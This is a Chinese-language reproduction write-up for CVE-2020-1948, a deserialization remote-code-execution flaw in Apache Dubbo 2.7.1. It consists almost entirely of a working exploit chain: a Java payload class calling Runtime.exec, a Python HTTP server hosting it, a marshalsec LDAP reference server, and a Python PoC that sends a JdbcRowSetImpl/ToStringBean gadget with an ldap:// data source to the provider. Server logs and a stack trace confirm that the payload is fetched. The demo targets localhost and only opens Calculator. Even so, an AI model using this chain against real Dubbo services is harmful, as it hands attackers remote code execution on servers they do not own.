[CVE-2020-1948]Apache Dubbo Provider默認反序列化RCE

git clone https://github.com/apache/dubbo-spring-boot-project
cd dubbo-spring-boot-project
git checkout 2.7.1 -b b2.7.1

# 將整個項目dubbo-spring-boot-project導入IDEA
在dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml

引入以下依賴：

        <dependency>
            <groupId>com.rometools</groupId>
            <artifactId>rome</artifactId>
            <version>1.7.0</version>
        </dependency>

修改默認端口：dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/resources/application.properties
爲12347

ExploitMac.java

public class ExploitMac{public ExploitMac(){try{java.lang.Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");}catch(java.io.IOException e){e.printStackTrace();}}}

terminal 1

[~/Downloads]$ cat ExploitMac.java                                                                                                [23:55:12]
public class ExploitMac{public ExploitMac(){try{java.lang.Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");}catch(java.io.IOException e){e.printStackTrace();}}}
[~/Downloads]$ vi ExploitMac.java                                                                                                 [23:43:04]
[~/Downloads]$ javac ExploitMac.java                                                                                              [23:43:17]
[~/Downloads]$ python3 -m http.server 8088                                                                                        [23:43:19]
zsh: correct 'http.server' to 'httpserver' [nyae]? n
Serving HTTP on 0.0.0.0 port 8088 (http://0.0.0.0:8088/) ...

127.0.0.1 - - [23/Jun/2020 23:49:27] "GET /ExploitMac.class HTTP/1.1" 200 -

terminal 2

[master][~/GitProjects/marshalsec]$ java -cp ./target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8088/#ExploitMac 8087
Listening on 0.0.0.0:8087
Send LDAP reference result for ExploitMac redirecting to http://127.0.0.1:8088/ExploitMac.class

terminal 3

$ python3 -m pip install dubbo-py
$ python3 dubbo3.py

PoC

from dubbo.codec.hessian2 import Decoder,new_object
from dubbo.client import DubboClient

client = DubboClient('127.0.0.1', 12347)

JdbcRowSetImpl=new_object(
      'com.sun.rowset.JdbcRowSetImpl',
      dataSource="ldap://127.0.0.1:8087/ExploitMac",
      strMatchColumns=["foo"]
      )
JdbcRowSetImplClass=new_object(
      'java.lang.Class',
      name="com.sun.rowset.JdbcRowSetImpl",
      )
toStringBean=new_object(
      'com.rometools.rome.feed.impl.ToStringBean',
      beanClass=JdbcRowSetImplClass,
      obj=JdbcRowSetImpl
      )

resp = client.send_request_and_return_response(
    service_name='org.apache.dubbo.spring.boot.demo.consumer.DemoService',
    method_name='rce',
    args=[toStringBean])

IDEA報錯

2020-06-23 23:49:27.073 ERROR 66497 --- [12347-thread-17] c.rometools.rome.feed.impl.ToStringBean  : Error while generating toString

java.lang.reflect.InvocationTargetException: null
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) ~[na:1.8.0_131]
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) ~[na:1.8.0_131]
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[na:1.8.0_131]
	at java.lang.reflect.Method.invoke(Method.java:498) ~[na:1.8.0_131]
	at com.rometools.rome.feed.impl.ToStringBean.toString(ToStringBean.java:158) [rome-1.7.0.jar:1.7.0]
	at com.rometools.rome.feed.impl.ToStringBean.toString(ToStringBean.java:129) [rome-1.7.0.jar:1.7.0]
	at java.lang.String.valueOf(String.java:2994) [na:1.8.0_131]
	at java.util.Arrays.toString(Arrays.java:4571) [na:1.8.0_131]
	at org.apache.dubbo.rpc.RpcInvocation.toString(RpcInvocation.java:211) [dubbo-2.7.1.jar:2.7.1]
	at java.lang.String.valueOf(String.java:2994) [na:1.8.0_131]
	at java.lang.StringBuilder.append(StringBuilder.java:131) [na:1.8.0_131]
	at org.apache.dubbo.rpc.protocol.dubbo.DubboProtocol.getInvoker(DubboProtocol.java:248) [dubbo-2.7.1.jar:2.7.1]
	at org.apache.dubbo.rpc.protocol.dubbo.DubboProtocol$1.reply(DubboProtocol.java:102) [dubbo-2.7.1.jar:2.7.1]
	at org.apache.dubbo.remoting.exchange.support.header.HeaderExchangeHandler.handleRequest(HeaderExchangeHandler.java:103) [dubbo-2.7.1.jar:2.7.1]
	at org.apache.dubbo.remoting.exchange.support.header.HeaderExchangeHandler.received(HeaderExchangeHandler.java:200) [dubbo-2.7.1.jar:2.7.1]
	at org.apache.dubbo.remoting.transport.DecodeHandler.received(DecodeHandler.java:51) [dubbo-2.7.1.jar:2.7.1]
	at org.apache.dubbo.remoting.transport.dispatcher.ChannelEventRunnable.run(ChannelEventRunnable.java:57) [dubbo-2.7.1.jar:2.7.1]
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) [na:1.8.0_131]
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617) [na:1.8.0_131]
	at java.lang.Thread.run(Thread.java:748) [na:1.8.0_131]
Caused by: java.sql.SQLException: JdbcRowSet (連接) JNDI 無法連接
	at com.sun.rowset.JdbcRowSetImpl.connect(JdbcRowSetImpl.java:634) ~[na:1.8.0_131]
	at com.sun.rowset.JdbcRowSetImpl.getDatabaseMetaData(JdbcRowSetImpl.java:4004) ~[na:1.8.0_131]
	... 20 common frames omitted

Wireshak:8087

Wireshak:12347

Demo

參考

• https://mp.weixin.qq.com/s/iKQbdWrMG00Arg0aEUbrXQ
• https://www.mail-archive.com/[email protected]/msg06544.html